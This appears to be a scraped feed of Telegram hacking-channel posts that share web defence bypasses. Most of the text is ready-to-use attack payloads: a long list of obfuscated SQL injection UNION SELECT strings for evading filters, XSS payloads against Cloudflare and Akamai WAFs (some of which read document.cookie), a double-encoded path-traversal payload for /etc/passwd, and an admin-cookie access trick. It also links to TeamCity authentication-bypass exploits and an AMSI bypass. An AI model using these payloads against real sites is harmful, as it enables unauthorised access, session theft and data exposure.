NoMore403
Introduction:
Prerequisites:
Before you install and run
Installation:
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
Github
⬇️ Download
#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Introduction:
nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.Prerequisites:
Before you install and run
nomore403, make sure you have the following:Go 1.15 or higher installed on your machineInstallation:
cd nomore403
go get
go build
Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.
Usage:
./nomore403 -h
Github
⬇️ Download
🔒 LearnExploit#Pentesting #Bypass
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
Bypass open redirection whitelisted using chinese dots:
Tip: Keep eyes on SSO redirects
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
%E3%80%82Tip: Keep eyes on SSO redirects
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Akamai WAF bypass XSS
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass SQL union select
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
bypass XSS Cloudflare WAF
Encoded Payload:
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Encoded Payload:
"><track/onerror='confirm\%601\%60'>Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
find an admin panel bypass using (admin=1).
/admin/tools/* --> 404 not found
but in the response there was a new cookie (with empty value) --> Set-Cookie:admin=;
Bypass request:
GET /admin HTTP/1.1
Cookie:admin=1;
#Trick #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
/admin/tools/* --> 404 not found
but in the response there was a new cookie (with empty value) --> Set-Cookie:admin=;
Bypass request:
GET /admin HTTP/1.1
Cookie:admin=1;
#Trick #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2024-27198 & CVE-2024-27199 AUTHENTICATION BYPASS
Rce in jetbrains teamcity exploit
Github
Github
#exploit #Cve #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Rce in jetbrains teamcity exploit
Github
Github
#exploit #Cve #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
A cloudflare verification bypass script for webscraping
Github
#cloudflare #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#cloudflare #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
TeamCity
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass
LearnBox:
1_Exploits
2_Video
#CVE #Bug #Authentication #Bypass
➖➖➖➖➖➖➖
📣 T.me/LearnExploit
📣 T.me/BugCod3
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass
LearnBox:
1_Exploits
2_Video
#CVE #Bug #Authentication #Bypass
➖➖➖➖➖➖➖
📣 T.me/LearnExploit
📣 T.me/BugCod3
Nice collection of XSS filters bypasses 💎
Github
#Bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Stored Xss payload 🔥
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Xss Payload
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite
Link
#Writeup #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#Writeup #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
CloudFlare XSS protection WAF Bypassed 💎
#WAF #XSS #Bypass #CloudFlare
——————
0Day.Today
@LearnExploit
@Tech_Army
<Img Src=OnXSS OnError=confirm(document.cookie)>#WAF #XSS #Bypass #CloudFlare
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypassed strong Akamai WAF
payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
#Waf #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
#Waf #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
"AMSI WRITE RAID" Vulnerability that leads to an effective AMSI BYPASS
Github
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
payload to bypass Akamai WAF
#WAF #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
?foobar=<foo%20bar=%250a%20onclick=<your js code>#WAF #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Sql injection Manual Bypass WAF
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Forwarded from Root Exploit
Directory Traversal Bypass Payload ⚡️
/../../etc/passwd - 403 Forbidden 🚫
%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK ✅
#Bypass #Payload
——————
@Learnexploit
@A3l3_KA4 💎
/../../etc/passwd - 403 Forbidden 🚫
%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd - 200 OK ✅
#Bypass #Payload
——————
@Learnexploit
@A3l3_KA4 💎
A Cloudflare WAF bypass combining simple (but efficient) tricks
A payload with some obfuscation & filter evasion tricks
#CF #WAF #Bypass #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1>`A payload with some obfuscation & filter evasion tricks
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>#CF #WAF #Bypass #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM